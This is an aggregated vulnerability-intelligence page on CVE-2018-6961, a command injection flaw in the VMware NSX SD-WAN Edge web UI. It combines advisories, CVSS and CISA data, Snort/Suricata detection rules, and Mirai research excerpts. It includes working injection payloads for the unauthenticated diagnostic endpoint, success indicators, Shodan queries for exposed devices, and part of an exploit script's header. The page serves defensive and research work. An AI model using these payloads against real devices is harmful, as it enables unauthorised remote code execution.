CVE-2018-6961
published 2018-06-11CVE-2018-6961: VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled…
PriorityP190high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
86.43%
99.7th percentile
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | nsx_sd-wan_by_velocloud | < 3.1.0 | 3.1.0 |
| vmware | nsx_sd-wan_by_velocloud | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commanddestination=8.8.8.8`id`&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic↗
commanddestination=8.8.8.8$(id;echo {{rand}})&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic↗
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"destination="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/destination=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025767; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection 2"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"name="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/name=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025768; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
- →Exploit targets the unauthenticated POST endpoint /scripts/ajaxPortal.lua with _cmd=run_diagnostic and shell metacharacters ($() or backticks) injected into the 'destination' or 'name' POST body parameters. ↗
- →A successful exploitation response contains JSON status OK and output matching uid=/gid= from the injected 'id' command; absence of 'UNKNOWN_COMMAND' in the response body also indicates success. ↗
- →Shodan/FOFA queries for exposed VeloCloud web UIs can identify attack surface: title:"VeloCloud" (Shodan) and title="VeloCloud" (FOFA). ↗
- →The exploit uses the X-Requested-With: XMLHttpRequest header alongside Content-Type: application/x-www-form-urlencoded; charset=UTF-8, which can be used as an additional filter in HTTP traffic analysis. ↗
- →DNS injection variant uses the 'name' POST parameter instead of 'destination', with test=DNS_TEST, also injectable with $() shell syntax. ↗
- ·The vulnerable local web UI component is disabled by default; exploitation is only possible if it has been explicitly enabled, and VMware advises it should not be enabled on untrusted networks. ↗
- ·The exploit author notes that the target runs a slimmed-down Linux, so standard reverse shell techniques (e.g., nc -e) may not work; exfiltration via piping stdout to netcat is the demonstrated approach. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.1HIGH
cisa8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rvjq-qp5f-gvx6: VMware NSX SD-WAN Edge by VeloCloud prior to version 3
ghsa_unreviewed·2022-05-13
CVE-2018-6961 [HIGH] CWE-78 GHSA-rvjq-qp5f-gvx6: VMware NSX SD-WAN Edge by VeloCloud prior to version 3
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.
VulnCheck
VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability
vulncheck·2018·CVSS 8.1
CVE-2018-6961 [HIGH] CWE-78 VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability
VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability
VMware SD-WAN Edge by VeloCloud contains a command injection vulnerability in the local web UI component. Successful exploitation of this issue could result in remote code execution.
Affected: VMware SD-WAN Edge
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/; https://www.akamai.com/blog/security/latest-echobot-26-infection-vectors; https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?d
CISA
VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability
cisa·2022-03-25·CVSS 8.1
CVE-2018-6961 [HIGH] CWE-78 VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability
Vulnerability: VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability
Affected: VMware SD-WAN Edge
VMware SD-WAN Edge by VeloCloud contains a command injection vulnerability in the local web UI component. Successful exploitation of this issue could result in remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-6961
Remediation Due Date: 2022-04-15
Suricata
ET EXPLOIT VMware NSX SD-WAN Command Injection
suricata·2018-07-02
CVE-2018-6961 ET EXPLOIT VMware NSX SD-WAN Command Injection
ET EXPLOIT VMware NSX SD-WAN Command Injection
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"destination="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/destination=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025767; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movem
Suricata
ET EXPLOIT VMware NSX SD-WAN Command Injection 2
suricata·2018-07-02
CVE-2018-6961 ET EXPLOIT VMware NSX SD-WAN Command Injection 2
ET EXPLOIT VMware NSX SD-WAN Command Injection 2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection 2"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"name="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/name=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025768; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre
Exploit-DB
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection
exploitdb·2018-07-02·CVSS 8.1
CVE-2018-6961 [HIGH] VMware NSX SD-WAN Edge < 3.1.2 - Command Injection
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection
---
#!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Critical Start
# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
# Vendor Homepage: https://www.vmware.com
# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html
# Version: 3.1.1
# CVE: CVE-2018-6961
import argparse
import requests
import sys
import collections
'''
This script will return execute whatever payload you placed within it.
Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
The command within this script will send stdou
Nuclei
VMware NSX SD-WAN Edge - Command Injection
nuclei·CVSS 8.1
CVE-2018-6961 [HIGH] VMware NSX SD-WAN Edge - Command Injection
VMware NSX SD-WAN Edge - Command Injection
VMware NSX SD-WAN Edge (formerly VeloCloud Edge) before 3.1.2 contains an unauthenticated command injection in the local web UI diagnostic tools (Ping/Traceroute). This template detects it reliably by injecting 'id', 'whoami', and a random marker.
Template:
id: CVE-2018-6961
info:
name: VMware NSX SD-WAN Edge - Command Injection
author: D3nverNg,thewindghost
severity: critical
description: |
VMware NSX SD-WAN Edge (formerly VeloCloud Edge) before 3.1.2 contains an unauthenticated command injection in the local web UI diagnostic tools (Ping/Traceroute). This template detects it reliably by injecting 'id', 'whoami', and a random marker.
impact: |
Successful exploitation allows unauthenticated remote code execution as root.
remediation: |
Upgrade
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
blogs_unit42·2019-06-07·CVSS 9.8
[CRITICAL] New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless presentation systems to set-top-boxes, SD-WANs, and even smart home controllers.
Mirai initially made use of default credentials to gain access to devices. However, since the end of 2017, samples of the family have increasingly been observed making use of publicly available exploits to propagate and run on vulnerable devices.
2018
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
blogs_unit42·2019-06-07·CVSS 9.8
CVE-2017-5174 [CRITICAL] New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Threat Research Center
Threat Research
Malware
## New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Ruchna Nigam
Published: June 6, 2019
Malware
Threat Research
Vulnerabilities
CVE-2017-5174
CVE-2018-11510
CVE-2018-17173
CVE-2018-6961
CVE-2019-2725
CVE-2019-3929
Exploits
IoT
Linux
Mirai
Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless prese
http://www.securityfocus.com/bid/104185http://www.securitytracker.com/id/1041210http://www.vmware.com/security/advisories/VMSA-2018-0011.htmlhttps://www.exploit-db.com/exploits/44959/http://www.securityfocus.com/bid/104185http://www.securitytracker.com/id/1041210http://www.vmware.com/security/advisories/VMSA-2018-0011.htmlhttps://www.exploit-db.com/exploits/44959/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-6961
2018-06-11
Published
2022-03-25
Added to CISA KEV
Exploited in the wild